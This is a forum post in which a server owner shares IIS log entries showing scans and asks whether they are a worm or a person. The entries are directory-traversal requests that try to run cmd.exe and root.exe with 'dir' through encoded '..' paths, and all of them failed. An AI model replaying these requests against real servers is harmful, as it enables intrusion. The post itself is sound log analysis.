Originally posted by Grizzly:
I don't think so...though there was one unrelated Code Red 2 attack in there. But the stuff I'm concerned about is this:
Code:
80 GET /scripts/root.exe /c+dir 404 - -
80 GET /MSADC/root.exe /c+dir 404 - -
80 GET /c/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /d/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 - -
80 GET /winnt/system32/cmd.exe /c+dir 404 - -
80 GET /winnt/system32/cmd.exe /c+dir 404 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - -
80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 - -
To me, this looks more like some plain ol' script kiddy crap that tries a bunch of common directory traversal exploits on IIS. There were 3 different IP's which tried this, 2 of which were in the same *.*.* IP group. I'm not sure if it's someone who just feels like pounding on my server until they get in.....or perhaps it is just some auto-hack worm that's trying to spread itself over the net again.